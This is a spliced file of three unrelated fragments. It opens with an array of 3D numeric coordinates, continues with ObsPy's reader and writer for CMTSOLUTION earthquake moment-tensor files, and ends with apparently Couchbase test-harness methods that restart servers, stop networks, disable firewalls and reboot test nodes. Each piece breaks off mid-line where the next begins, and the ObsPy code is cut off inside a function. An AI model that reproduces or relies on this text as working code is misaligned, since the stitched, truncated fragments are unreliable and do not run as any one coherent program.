[-0.56779754185188, -0.89215000219033, -0.27002622797889],
[-0.42195032631194, -0.89124316588241, -0.26485618149372],
[-0.27002622797889, -0.89215000219033, -0.27002622797889],
[-0.11711906410810, -0.89515246800868, -0.28598097100158],
[0.03363890258581, -0.90132394717945, -0.31409235901703],
[0.18303628620988, -0.91361325731751, -0.35580977157487],
[0.32126514396144, -0.94153338637932, -0.37973175758212],
[-1.00000000000000, -0.85055979016974, -0.33819570282874],
[-0.90132394717945, -0.81822259638933, -0.31409235901703],
[-0.79964507343425, -0.79964507343425, -0.28431281823316],
[-0.68226100768640, -0.78928444359942, -0.26422727435709],
[-0.55093034546477, -0.78460952663812, -0.25437950550522],
[-0.41008062239189, -0.78460952663812, -0.25437950550522],
[-0.26422727435709, -0.78928444359942, -0.26422727435709],
[-0.11639703489834, -0.79964507343425, -0.28431281823316],
[0.03363890258581, -0.81822259638933, -0.31409235901703],
[0.18875549299847, -0.85055979016974, -0.33819570282874],
[-1.00000000000000, -0.73266516174362, -0.30834740911645],
[-0.89515246800868, -0.70174749688164, -0.28598097100158],
[-0.78928444359942, -0.68226100768640, -0.26422727435709],
[-0.67157579256611, -0.67157579256611, -0.25074997111992],
[-0.54278153811667, -0.66817385848353, -0.24626306528312],
[-0.40609844374786, -0.67157579256611, -0.25074997111992],
[-0.26422727435709, -0.68226100768640, -0.26422727435709],
[-0.11711906410810, -0.70174749688164, -0.28598097100158],
[0.04101257086006, -0.73266516174362, -0.30834740911645],
[-1.00000000000000, -0.59392944953705, -0.28907450090662],
[-0.89215000219033, -0.56779754185188, -0.27002622797889],
[-0.78460952663812, -0.55093034546477, -0.25437950550522],
[-0.66817385848353, -0.54278153811667, -0.24626306528312],
[-0.54278153811667, -0.54278153811667, -0.24626306528312],
[-0.41008062239189, -0.55093034546477, -0.25437950550522],
[-0.27002622797889, -0.56779754185188, -0.27002622797889],
[-0.11699604955632, -0.59392944953705, -0.28907450090662],
[-1.00000000000000, -0.44074627544316, -0.27962686227842],
[-0.89124316588241, -0.42195032631194, -0.26485618149372],
[-0.78460952663812, -0.41008062239189, -0.25437950550522],
[-0.67157579256611, -0.40609844374786, -0.25074997111992],
[-0.55093034546477, -0.41008062239189, -0.25437950550522],
[-0.42195032631194, -0.42195032631194, -0.26485618149372],
[-0.27962686227842, -0.44074627544316, -0.27962686227842],
[-1.00000000000000, -0.27962686227842, -0.27962686227842],
[-0.89215000219033, -0.27002622797889, -0.27002622797889],
[-0.78928444359942, -0.26422727435709, -0.26422727435709],
[-0.68226100768640, -0.26422727435709, -0.26422727435709],
[-0.56779754185188, -0.27002622797889, -0.27002622797889],
[-0.44074627544316, -0.27962686227842, -0.27962686227842],
[-1.00000000000000, -0.11699604955632, -0.28907450090662],
[-0.89515246800868, -0.11711906410810, -0.28598097100158],
[-0.79964507343425, -0.11639703489834, -0.28431281823316],
[-0.70174749688164, -0.11711906410810, -0.28598097100158],
[-0.59392944953705, -0.11699604955632, -0.28907450090662],
[-1.00000000000000, 0.04101257086006, -0.30834740911645],
[-0.90132394717945, 0.03363890258581, -0.31409235901703],
[-0.81822259638933, 0.03363890258581, -0.31409235901703],
[-0.73266516174362, 0.04101257086006, -0.30834740911645],
[-1.00000000000000, 0.18875549299847, -0.33819570282874],
[-0.91361325731751, 0.18303628620988, -0.35580977157487],
[-0.85055979016974, 0.18875549299847, -0.33819570282874],
[-1.00000000000000, 0.32126514396144, -0.37973175758212],
[-0.94153338637932, 0.32126514396144, -0.37973175758212],
[-1.00000000000000, 0.43441503691212, -0.43441503691212],
[-1.00000000000000, -1.00000000000000, -0.26636265287828],
[-0.94031572376258, -1.00000000000000, -0.20795453403575],
[-0.84856652844490, -1.00000000000000, -0.16450620740505],
[-0.73091449282331, -1.00000000000000, -0.13454275358835],
[-0.59392944953705, -1.00000000000000, -0.11699604955632],
[-0.44439033087540, -1.00000000000000, -0.11121933824920],
[-0.28907450090662, -1.00000000000000, -0.11699604955632],
[-0.13454275358835, -1.00000000000000, -0.13454275358835],
[0.01307273584995, -1.00000000000000, -0.16450620740505],
[0.14827025779833, -1.00000000000000, -0.20795453403575],
[0.26636265287828, -1.00000000000000, -0.26636265287828],
[-1.00000000000000, -0.94031572376258, -0.20795453403575],
[-0.91281028806768, -0.91281028806768, -0.17821561606993],
[-0.81702189747097, -0.90088437869935, -0.14104686191484],
[-0.70174749688164, -0.89515246800868, -0.11711906410810],
[-0.57106333491179, -0.89275319595316, -0.10553799050153],
[-0.43064547863352, -0.89275319595316, -0.10553799050153],
[-0.28598097100158, -0.89515246800868, -0.11711906410810],
[-0.14104686191484, -0.90088437869935, -0.14104686191484],
[0.00383619220529, -0.91281028806768, -0.17821561606993],
[0.14827025779834, -0.94031572376258, -0.20795453403575],
[-1.00000000000000, -0.84856652844490, -0.16450620740505],
[-0.90088437869935, -0.81702189747097, -0.14104686191484],
[-0.79964507343425, -0.79964507343425, -0.11639703489834],
[-0.68465203917083, -0.79077416730400, -0.10126470700993],
[-0.55785828724523, -0.78803820908470, -0.09624521642484],
[-0.42330908651523, -0.79077416730400, -0.10126470700993],
[-0.28431281823316, -0.79964507343425, -0.11639703489834],
[-0.14104686191484, -0.81702189747097, -0.14104686191484],
[0.01307273584995, -0.84856652844490, -0.16450620740505],
[-1.00000000000000, -0.73091449282331, -0.13454275358835],
[-0.89515246800868, -0.70174749688164, -0.11711906410810],
[-0.79077416730400, -0.68465203917083, -0.10126470700993],
[-0.67674763053283, -0.67674763053283, -0.09293873548053],
[-0.55356600345381, -0.67674763053283, -0.09293873548053],
[-0.42330908651523, -0.68465203917083, -0.10126470700993],
[-0.28598097100158, -0.70174749688164, -0.11711906410810],
[-0.13454275358835, -0.73091449282331, -0.13454275358835],
[-1.00000000000000, -0.59392944953705, -0.11699604955632],
[-0.89275319595316, -0.57106333491179, -0.10553799050153],
[-0.78803820908470, -0.55785828724523, -0.09624521642484],
[-0.67674763053283, -0.55356600345381, -0.09293873548053],
[-0.55785828724523, -0.55785828724523, -0.09624521642484],
[-0.43064547863352, -0.57106333491179, -0.10553799050153],
[-0.28907450090662, -0.59392944953705, -0.11699604955632],
[-1.00000000000000, -0.44439033087540, -0.11121933824920],
[-0.89275319595316, -0.43064547863352, -0.10553799050153],
[-0.79077416730400, -0.42330908651523, -0.10126470700993],
[-0.68465203917083, -0.42330908651523, -0.10126470700993],
[-0.57106333491179, -0.43064547863352, -0.10553799050153],
[-0.44439033087540, -0.44439033087540, -0.11121933824920],
[-1.00000000000000, -0.28907450090662, -0.11699604955632],
[-0.89515246800868, -0.28598097100158, -0.11711906410810],
[-0.79964507343425, -0.28431281823316, -0.11639703489834],
[-0.70174749688164, -0.28598097100158, -0.11711906410810],
[-0.59392944953705, -0.28907450090662, -0.11699604955632],
[-1.00000000000000, -0.13454275358835, -0.13454275358835],
[-0.90088437869935, -0.14104686191484, -0.14104686191484],
[-0.81702189747097, -0.14104686191484, -0.14104686191484],
[-0.73091449282331, -0.13454275358835, -0.13454275358835],
[-1.00000000000000, 0.01307273584995, -0.16450620740505],
[-0.91281028806768, 0.00383619220529, -0.17821561606993],
[-0.84856652844490, 0.01307273584995, -0.16450620740505],
[-1.00000000000000, 0.14827025779833, -0.20795453403575],
[-0.94031572376258, 0.14827025779833, -0.20795453403575],
[-1.00000000000000, 0.26636265287828, -0.26636265287828],
[-1.00000000000000, -1.00000000000000, -0.08974909348465],
[-0.93992089073865, -1.00000000000000, -0.03003955463067],
[-0.84856652844490, -1.00000000000000, 0.01307273584995],
[-0.73266516174362, -1.00000000000000, 0.04101257086006],
[-0.59925804242534, -1.00000000000000, 0.05474066986092],
[-0.45548262743559, -1.00000000000000, 0.05474066986092],
[-0.30834740911645, -1.00000000000000, 0.04101257086006],
[-0.16450620740505, -1.00000000000000, 0.01307273584995],
[-0.03003955463067, -1.00000000000000, -0.03003955463067],
[0.08974909348465, -1.00000000000000, -0.08974909348465],
[-1.00000000000000, -0.93992089073865, -0.03003955463067],
[-0.91281028806768, -0.91281028806768, 0.00383619220529],
[-0.81822259638933, -0.90132394717945, 0.03363890258581],
[-0.70620673063170, -0.89619431421031, 0.05129999285461],
[-0.58120945840524, -0.89470167097220, 0.05712058778268],
[-0.44889894801261, -0.89619431421031, 0.05129999285461],
[-0.31409235901703, -0.90132394717945, 0.03363890258581],
[-0.17821561606993, -0.91281028806768, 0.00383619220529],
[-0.03003955463067, -0.93992089073865, -0.03003955463067],
[-1.00000000000000, -0.84856652844490, 0.01307273584995],
[-0.90132394717945, -0.81822259638933, 0.03363890258581],
[-0.80237272611754, -0.80237272611754, 0.05098734855452],
[-0.69209820344694, -0.79546369024868, 0.05991487568396],
[-0.57235298198835, -0.79546369024868, 0.05991487568396],
[-0.44624189631944, -0.80237272611754, 0.05098734855452],
[-0.31409235901703, -0.81822259638933, 0.03363890258581],
[-0.16450620740505, -0.84856652844490, 0.01307273584995],
[-1.00000000000000, -0.73266516174362, 0.04101257086006],
[-0.89619431421031, -0.70620673063170, 0.05129999285461],
[-0.79546369024868, -0.69209820344694, 0.05991487568396],
[-0.68766270949317, -0.68766270949317, 0.06298812847952],
[-0.57235298198835, -0.69209820344694, 0.05991487568396],
[-0.44889894801261, -0.70620673063170, 0.05129999285461],
[-0.30834740911645, -0.73266516174362, 0.04101257086006],
[-1.00000000000000, -0.59925804242534, 0.05474066986092],
[-0.89470167097220, -0.58120945840524, 0.05712058778268],
[-0.79546369024868, -0.57235298198835, 0.05991487568396],
[-0.69209820344694, -0.57235298198835, 0.05991487568396],
[-0.58120945840524, -0.58120945840524, 0.05712058778268],
[-0.45548262743559, -0.59925804242534, 0.05474066986092],
[-1.00000000000000, -0.45548262743559, 0.05474066986092],
[-0.89619431421031, -0.44889894801261, 0.05129999285461],
[-0.80237272611754, -0.44624189631944, 0.05098734855452],
[-0.70620673063170, -0.44889894801261, 0.05129999285461],
[-0.59925804242534, -0.45548262743559, 0.05474066986092],
[-1.00000000000000, -0.30834740911645, 0.04101257086006],
[-0.90132394717945, -0.31409235901703, 0.03363890258581],
[-0.81822259638933, -0.31409235901703, 0.03363890258581],
[-0.73266516174362, -0.30834740911645, 0.04101257086006],
[-1.00000000000000, -0.16450620740505, 0.01307273584995],
[-0.91281028806768, -0.17821561606993, 0.00383619220529],
[-0.84856652844490, -0.16450620740505, 0.01307273584995],
[-1.00000000000000, -0.03003955463067, -0.03003955463067],
[-0.93992089073865, -0.03003955463067, -0.03003955463067],
[-1.00000000000000, 0.08974909348465, -0.08974909348465],
[-1.00000000000000, -1.00000000000000, 0.08974909348465],
[-0.94031572376258, -1.00000000000000, 0.14827025779833],
[-0.85055979016974, -1.00000000000000, 0.18875549299847],
[-0.73801547866742, -1.00000000000000, 0.21251686847555],
[-0.61017433892153, -1.00000000000000, 0.22034867784306],
[-0.47450138980813, -1.00000000000000, 0.21251686847555],
[-0.33819570282874, -1.00000000000000, 0.18875549299847],
[-0.20795453403575, -1.00000000000000, 0.14827025779834],
[-0.08974909348465, -1.00000000000000, 0.08974909348465],
[-1.00000000000000, -0.94031572376258, 0.14827025779833],
[-0.91361325731751, -0.91361325731751, 0.18303628620988],
[-0.82197902687780, -0.90271908968347, 0.20328382595397],
[-0.71565649846207, -0.89849390365871, 0.21353103704236],
[-0.59938063492158, -0.89849390365871, 0.21353103704236],
[-0.47858570939270, -0.90271908968347, 0.20328382595397],
[-0.35580977157487, -0.91361325731751, 0.18303628620988],
[-0.20795453403575, -0.94031572376258, 0.14827025779833],
[-1.00000000000000, -0.85055979016974, 0.18875549299847],
[-0.90271908968347, -0.82197902687780, 0.20328382595397],
[-0.80821469636381, -0.80821469636381, 0.21200732961882],
[-0.70546057011574, -0.80407960155614, 0.21500074178762],
[-0.59557793689121, -0.80821469636381, 0.21200732961882],
[-0.47858570939270, -0.82197902687780, 0.20328382595397],
[-0.33819570282874, -0.85055979016974, 0.18875549299847],
[-1.00000000000000, -0.73801547866742, 0.21251686847555],
[-0.89849390365871, -0.71565649846207, 0.21353103704236],
[-0.80407960155614, -0.70546057011574, 0.21500074178762],
[-0.70546057011574, -0.70546057011574, 0.21500074178762],
[-0.59938063492158, -0.71565649846207, 0.21353103704236],
[-0.47450138980813, -0.73801547866742, 0.21251686847555],
[-1.00000000000000, -0.61017433892153, 0.22034867784306],
[-0.89849390365871, -0.59938063492158, 0.21353103704236],
[-0.80821469636381, -0.59557793689120, 0.21200732961882],
[-0.71565649846207, -0.59938063492158, 0.21353103704236],
[-0.61017433892153, -0.61017433892153, 0.22034867784306],
[-1.00000000000000, -0.47450138980813, 0.21251686847555],
[-0.90271908968347, -0.47858570939270, 0.20328382595397],
[-0.82197902687780, -0.47858570939270, 0.20328382595397],
[-0.73801547866742, -0.47450138980813, 0.21251686847555],
[-1.00000000000000, -0.33819570282874, 0.18875549299847],
[-0.91361325731751, -0.35580977157487, 0.18303628620988],
[-0.85055979016974, -0.33819570282874, 0.18875549299847],
[-1.00000000000000, -0.20795453403575, 0.14827025779834],
[-0.94031572376258, -0.20795453403575, 0.14827025779834],
[-1.00000000000000, -0.08974909348465, 0.08974909348465],
[-1.00000000000000, -1.00000000000000, 0.26636265287828],
[-0.94153338637932, -1.00000000000000, 0.32126514396144],
[-0.85467813358830, -1.00000000000000, 0.35691459954653],
[-0.74725908993286, -1.00000000000000, 0.37445219127856],
[-0.62719310134570, -1.00000000000000, 0.37445219127856],
[-0.50223646595824, -1.00000000000000, 0.35691459954653],
[-0.37973175758212, -1.00000000000000, 0.32126514396144],
[-0.26636265287828, -1.00000000000000, 0.26636265287828],
[-1.00000000000000, -0.94153338637932, 0.32126514396144],
[-0.91533769804486, -0.91533769804486, 0.35235807928655],
[-0.82880683679752, -0.90533315725650, 0.36192227945240],
[-0.73132910648164, -0.90259903319141, 0.36525724615468],
[-0.62778228539838, -0.90533315725650, 0.36192227945240],
[-0.52168268319682, -0.91533769804486, 0.35235807928655],
[-0.37973175758212, -0.94153338637932, 0.32126514396144],
[-1.00000000000000, -0.85467813358830, 0.35691459954653],
[-0.90533315725650, -0.82880683679752, 0.36192227945240],
[-0.81806030657087, -0.81806030657087, 0.36234260848776],
[-0.72622199534603, -0.81806030657087, 0.36234260848776],
[-0.62778228539838, -0.82880683679752, 0.36192227945240],
[-0.50223646595824, -0.85467813358830, 0.35691459954653],
[-1.00000000000000, -0.74725908993286, 0.37445219127856],
[-0.90259903319141, -0.73132910648164, 0.36525724615468],
[-0.81806030657087, -0.72622199534603, 0.36234260848776],
[-0.73132910648164, -0.73132910648164, 0.36525724615468],
[-0.62719310134571, -0.74725908993286, 0.37445219127856],
[-1.00000000000000, -0.62719310134570, 0.37445219127856],
[-0.90533315725650, -0.62778228539838, 0.36192227945240],
[-0.82880683679752, -0.62778228539838, 0.36192227945240],
[-0.74725908993286, -0.62719310134570, 0.37445219127856],
[-1.00000000000000, -0.50223646595824, 0.35691459954653],
[-0.91533769804486, -0.52168268319682, 0.35235807928655],
[-0.85467813358830, -0.50223646595824, 0.35691459954653],
[-1.00000000000000, -0.37973175758212, 0.32126514396144],
[-0.94153338637932, -0.37973175758212, 0.32126514396144],
[-1.00000000000000, -0.26636265287828, 0.26636265287828],
[-1.00000000000000, -1.00000000000000, 0.43441503691212],
[-0.94367298086688, -1.00000000000000, 0.48345161520754],
[-0.86118354428076, -1.00000000000000, 0.51226141841950],
[-0.76088114861788, -1.00000000000000, 0.52176229723576],
[-0.65107787413874, -1.00000000000000, 0.51226141841950],
[-0.53977863434066, -1.00000000000000, 0.48345161520754],
[-0.43441503691212, -1.00000000000000, 0.43441503691212],
[-1.00000000000000, -0.94367298086688, 0.48345161520754],
[-0.91826859853484, -0.91826859853484, 0.50546430717196],
[-0.83977988741760, -0.90975051014484, 0.50506413346777],
[-0.75553373590533, -0.90975051014484, 0.50506413346777],
[-0.66892711010229, -0.91826859853484, 0.50546430717196],
[-0.53977863434066, -0.94367298086688, 0.48345161520754],
[-1.00000000000000, -0.86118354428076, 0.51226141841950],
[-0.90975051014484, -0.83977988741760, 0.50506413346777],
[-0.83354227525151, -0.83354227525151, 0.50062682575452],
[-0.75553373590533, -0.83977988741760, 0.50506413346777],
[-0.65107787413874, -0.86118354428076, 0.51226141841950],
[-1.00000000000000, -0.76088114861788, 0.52176229723576],
[-0.90975051014484, -0.75553373590533, 0.50506413346777],
[-0.83977988741760, -0.75553373590533, 0.50506413346777],
[-0.76088114861788, -0.76088114861788, 0.52176229723576],
[-1.00000000000000, -0.65107787413874, 0.51226141841950],
[-0.91826859853484, -0.66892711010229, 0.50546430717196],
[-0.86118354428076, -0.65107787413874, 0.51226141841950],
[-1.00000000000000, -0.53977863434066, 0.48345161520754],
[-0.94367298086688, -0.53977863434066, 0.48345161520754],
[-1.00000000000000, -0.43441503691212, 0.43441503691212],
[-1.00000000000000, -1.00000000000000, 0.58850483431866],
[-0.94689840816918, -1.00000000000000, 0.62972921442352],
[-0.87046490686619, -1.00000000000000, 0.65001691674374],
[-0.77955200987756, -1.00000000000000, 0.65001691674374],
[-0.68283080625434, -1.00000000000000, 0.62972921442352],
[-0.58850483431866, -1.00000000000000, 0.58850483431866],
[-1.00000000000000, -0.94689840816918, 0.62972921442352],
[-0.92300465044929, -0.92300465044929, 0.63735081525634],
[-0.85699505928483, -0.91725218290052,
<filename>IRIS_data_download/IRIS_download_support/obspy/io/cmtsolution/core.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CMTSOLUTION file format support for ObsPy.
:copyright:
The ObsPy Development Team (<EMAIL>)
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
import math
import uuid
import warnings
from obspy import UTCDateTime
from obspy.core.event import (Catalog, Comment, Event, EventDescription,
Origin, Magnitude, FocalMechanism, MomentTensor,
Tensor, SourceTimeFunction)
from obspy.geodetics import FlinnEngdahl
_fe = FlinnEngdahl()
def _get_resource_id(cmtname, res_type, tag=None):
"""
Helper function to create consistent resource ids.
"""
res_id = "smi:local/cmtsolution/%s/%s" % (cmtname, res_type)
if tag is not None:
res_id += "#" + tag
return res_id
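# For example (a sketch, hypothetical event name):
#   _get_resource_id("C201301010000A", "origin", tag="cmt")
# yields "smi:local/cmtsolution/C201301010000A/origin#cmt".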
def _buffer_proxy(filename_or_buf, function, reset_fp=True,
file_mode="rb", *args, **kwargs):
"""
Calls a function with an open file or file-like object as the first
argument. If the file originally was a filename, the file will be
opened, otherwise it will just be passed to the underlying function.
:param filename_or_buf: File to pass.
:type filename_or_buf: str, open file, or file-like object.
:param function: The function to call.
:param reset_fp: If True, the file pointer will be set to the initial
position after the function has been called.
:type reset_fp: bool
:param file_mode: Mode to open file in if necessary.
"""
try:
position = filename_or_buf.tell()
is_buffer = True
except AttributeError:
is_buffer = False
if is_buffer is True:
ret_val = function(filename_or_buf, *args, **kwargs)
if reset_fp:
filename_or_buf.seek(position, 0)
return ret_val
else:
with open(filename_or_buf, file_mode) as fh:
return function(fh, *args, **kwargs)
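# A minimal usage sketch (hypothetical filename): the two calls below are
# equivalent, since _buffer_proxy opens paths itself and passes open
# file-like objects straight through:
#   _buffer_proxy("event.cmt", _internal_is_cmtsolution)
#   with open("event.cmt", "rb") as fh:
#       _buffer_proxy(fh, _internal_is_cmtsolution)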
def _is_cmtsolution(filename_or_buf):
"""
Checks if the file is a CMTSOLUTION file.
:param filename_or_buf: File to test.
:type filename_or_buf: str or file-like object.
"""
try:
return _buffer_proxy(filename_or_buf, _internal_is_cmtsolution,
reset_fp=True)
# Happens for example when passing the data as a string which would be
# interpreted as a filename.
except OSError:
return False
def _internal_is_cmtsolution(buf):
"""
Checks if the file is a CMTSOLUTION file.
:param buf: File to check.
:type buf: Open file or open file like object.
"""
# The file format is so simple. Just attempt to read the first event. If
# it passes it will be read again but that has really no
# significant performance impact.
try:
_internal_read_single_cmtsolution(buf)
return True
except Exception:
return False
def _read_cmtsolution(filename_or_buf, **kwargs):
"""
Reads a CMTSOLUTION file to a :class:`~obspy.core.event.Catalog` object.
:param filename_or_buf: File to read.
:type filename_or_buf: str or file-like object.
"""
return _buffer_proxy(filename_or_buf, _internal_read_cmtsolution, **kwargs)
def _internal_read_cmtsolution(buf, **kwargs):
"""
Reads a CMTSOLUTION file to a :class:`~obspy.core.event.Catalog` object.
:param buf: File to read.
:type buf: Open file or open file like object.
"""
events = []
cur_pos = buf.tell()
# This also works with BytesIO and what not.
buf.seek(0, 2)
size = buf.tell()
buf.seek(cur_pos, 0)
    # This is pretty inefficient due to all the file pointer jumping but
    # performance is really the least of our concerns. Also most of the time
    # is still spent initializing the large ObsPy event objects.
while True:
if buf.tell() >= size:
break
line = buf.readline().strip()
# If there is something, jump back to the beginning of the line and
# read the next event.
if line:
buf.seek(cur_pos, 0)
events.append(_internal_read_single_cmtsolution(buf))
cur_pos = buf.tell()
return Catalog(resource_id=_get_resource_id("catalog", str(uuid.uuid4())),
events=events)
def _internal_read_single_cmtsolution(buf):
"""
Reads a single CMTSOLUTION file to a :class:`~obspy.core.event.Catalog`
object.
:param buf: File to read.
:type buf: Open file or open file like object.
"""
# The first line encodes the preliminary epicenter.
line = buf.readline()
hypocenter_catalog = line[:5].strip().decode()
origin_time = line[5:].strip().split()[:6]
values = list(map(int, origin_time[:-1])) + \
[float(origin_time[-1])]
try:
origin_time = UTCDateTime(*values)
except (TypeError, ValueError):
warnings.warn("Could not determine origin time from line: %s. Will "
"be set to zero." % line)
origin_time = UTCDateTime(0)
line = line[28:].split()
latitude, longitude, depth, body_wave_mag, surface_wave_mag = \
map(float, line[:5])
# The rest encodes the centroid solution.
event_name = buf.readline().strip().split()[-1].decode()
preliminary_origin = Origin(
resource_id=_get_resource_id(event_name, "origin", tag="prelim"),
time=origin_time,
longitude=longitude,
latitude=latitude,
# Depth is in meters.
depth=depth * 1000.0,
origin_type="hypocenter",
region=_fe.get_region(longitude=longitude, latitude=latitude),
evaluation_status="preliminary"
)
preliminary_bw_magnitude = Magnitude(
resource_id=_get_resource_id(event_name, "magnitude", tag="prelim_bw"),
mag=body_wave_mag, magnitude_type="Mb",
evaluation_status="preliminary",
origin_id=preliminary_origin.resource_id)
preliminary_sw_magnitude = Magnitude(
resource_id=_get_resource_id(event_name, "magnitude", tag="prelim_sw"),
mag=surface_wave_mag, magnitude_type="MS",
evaluation_status="preliminary",
origin_id=preliminary_origin.resource_id)
values = ["time_shift", "half_duration", "latitude", "longitude",
"depth", "m_rr", "m_tt", "m_pp", "m_rt", "m_rp", "m_tp"]
cmt_values = {_i: float(buf.readline().strip().split()[-1])
for _i in values}
# Moment magnitude calculation in dyne * cm.
m_0 = 1.0 / math.sqrt(2.0) * math.sqrt(
cmt_values["m_rr"] ** 2 +
cmt_values["m_tt"] ** 2 +
cmt_values["m_pp"] ** 2 +
2.0 * cmt_values["m_rt"] ** 2 +
2.0 * cmt_values["m_rp"] ** 2 +
2.0 * cmt_values["m_tp"] ** 2)
m_w = 2.0 / 3.0 * (math.log10(m_0) - 16.1)
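    # Worked example for the formula above: if m_0 comes out to
    # 1e24 dyne * cm, then m_w = 2/3 * (log10(1e24) - 16.1)
    # = 2/3 * 7.9, which is about 5.27.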
# Convert to meters.
cmt_values["depth"] *= 1000.0
    # Convert dyne * cm to Newton meter (1 N m = 1e7 dyne cm).
values = ["m_rr", "m_tt", "m_pp", "m_rt", "m_rp", "m_tp"]
for value in values:
cmt_values[value] /= 1E7
cmt_origin = Origin(
resource_id=_get_resource_id(event_name, "origin", tag="cmt"),
time=origin_time + cmt_values["time_shift"],
longitude=cmt_values["longitude"],
latitude=cmt_values["latitude"],
depth=cmt_values["depth"],
origin_type="centroid",
# Could rarely be different than the epicentral region.
region=_fe.get_region(longitude=cmt_values["longitude"],
latitude=cmt_values["latitude"])
# No evaluation status as it could be any of several and the file
# format does not provide that information.
)
cmt_mag = Magnitude(
resource_id=_get_resource_id(event_name, "magnitude", tag="mw"),
# Round to 2 digits.
mag=round(m_w, 2),
magnitude_type="mw",
origin_id=cmt_origin.resource_id
)
foc_mec = FocalMechanism(
resource_id=_get_resource_id(event_name, "focal_mechanism"),
# The preliminary origin most likely triggered the focal mechanism
# determination.
triggering_origin_id=preliminary_origin.resource_id
)
tensor = Tensor(
m_rr=cmt_values["m_rr"],
m_pp=cmt_values["m_pp"],
m_tt=cmt_values["m_tt"],
m_rt=cmt_values["m_rt"],
m_rp=cmt_values["m_rp"],
m_tp=cmt_values["m_tp"]
)
# Source time function is a triangle, according to the SPECFEM manual.
stf = SourceTimeFunction(
type="triangle",
# The duration is twice the half duration.
duration=2.0 * cmt_values["half_duration"]
)
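    # For example: a half duration of 1.8 s read from the file becomes a
    # 3.6 s triangular source time function here.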
mt = MomentTensor(
resource_id=_get_resource_id(event_name, "moment_tensor"),
derived_origin_id=cmt_origin.resource_id,
moment_magnitude_id=cmt_mag.resource_id,
# Convert to Nm.
scalar_moment=m_0 / 1E7,
tensor=tensor,
source_time_function=stf
)
# Assemble everything.
foc_mec.moment_tensor = mt
ev = Event(resource_id=_get_resource_id(event_name, "event"),
event_type="earthquake")
ev.event_descriptions.append(EventDescription(text=event_name,
type="earthquake name"))
ev.comments.append(Comment(
text="Hypocenter catalog: %s" % hypocenter_catalog,
force_resource_id=False))
ev.origins.append(cmt_origin)
ev.origins.append(preliminary_origin)
ev.magnitudes.append(cmt_mag)
ev.magnitudes.append(preliminary_bw_magnitude)
ev.magnitudes.append(preliminary_sw_magnitude)
ev.focal_mechanisms.append(foc_mec)
# Set the preferred items.
ev.preferred_origin_id = cmt_origin.resource_id.id
ev.preferred_magnitude_id = cmt_mag.resource_id.id
ev.preferred_focal_mechanism_id = foc_mec.resource_id.id
return ev
def _write_cmtsolution(catalog, filename_or_buf, **kwargs):
"""
Write an event to a file.
:param catalog: The catalog to write. Can only contain one event.
:type catalog: :class:`~obspy.core.event.Catalog`
:param filename_or_buf: Filename or file-like object to write to.
:type filename_or_buf: str, open file, or file-like object.
"""
return _buffer_proxy(filename_or_buf, _internal_write_cmtsolution,
file_mode="wb", catalog=catalog, **kwargs)
def _internal_write_cmtsolution(buf, catalog, **kwargs):
"""
Write events to a file.
:param buf: File to write to.
:type buf: Open file or file-like object.
:param catalog: The catalog to write.
:type catalog: :class:`~obspy.core.event.Catalog`
"""
# Some sanity checks.
if len(catalog) < 1:
raise ValueError("Catalog must contain at least one event")
for event in catalog:
_internal_write_single_cmtsolution(buf, event)
# Add an empty line between events.
if len(catalog) > 1:
buf.write(b"\n")
def _internal_write_single_cmtsolution(buf, event, **kwargs):
"""
Write an event to a file.
:param buf: File to write to.
:type buf: Open file or file-like object.
:param event: The event to write.
:type event: :class:`~obspy.core.event.Event`
"""
if not event.focal_mechanisms:
raise ValueError("Event must contain a focal mechanism.")
foc_mec = event.preferred_focal_mechanism() or event.focal_mechanisms[0]
if not foc_mec.moment_tensor:
raise ValueError("The preferred or first focal mechanism must "
"contain a moment tensor.")
mt = foc_mec.moment_tensor
if not mt.tensor:
raise ValueError("The preferred or first focal mechanism must "
"contain a moment tensor element with an actual "
"tensor.")
if not event.origins:
raise ValueError("Event must have at least one origin.")
if not event.magnitudes:
raise ValueError("Event must have at least one magnitude.")
# Attempt to get the body and surface wave magnitudes.
mb_candidates = \
[_i for _i in event.magnitudes if _i.magnitude_type == "Mb"]
ms_candidates = \
[_i for _i in event.magnitudes if _i.magnitude_type == "MS"]
if not mb_candidates:
warnings.warn("No body wave magnitude found. Will be replaced by the "
"first magnitude in the event object.")
mb_mag = event.magnitudes[0]
else:
mb_mag = mb_candidates[0]
if not ms_candidates:
warnings.warn("No surface wave magnitude found. Will be replaced by "
"the first magnitude in the event object.")
ms_mag = event.magnitudes[0]
else:
ms_mag = ms_candidates[0]
    # Now find the CMT origin. First attempt to get the derived origin of
    # the moment tensor.
if mt.derived_origin_id:
cmt_origin = mt.derived_origin_id.get_referred_object()
# Otherwise try to find the first one that is CMT
else:
candidates = [_i for _i in event.origins
if _i.origin_type == "centroid"]
if candidates:
warnings.warn("No derived origin attached to the moment tensor. "
"Will instead use | |
= node_failure_timer.start_time
def _disable_firewall(self, node):
shell = RemoteMachineShellConnection(node)
shell.disable_firewall()
shell.disconnect()
def _restart_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
shell.restart_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Restarted couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(1)
shell = RemoteMachineShellConnection(node)
shell.stop_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Stopped couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_couchbase_server(self, node):
shell = RemoteMachineShellConnection(node)
shell.start_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Started couchbase server".format(node))
def _stop_restart_network(self, node, stop_time):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
shell.stop_network(stop_time)
shell.disconnect()
self.test_log.debug("Stopped the network for {0} sec and restarted "
"the network on {1}".format(stop_time, node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _restart_machine(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
command = "/sbin/reboot"
shell.execute_command(command=command)
shell.disconnect()
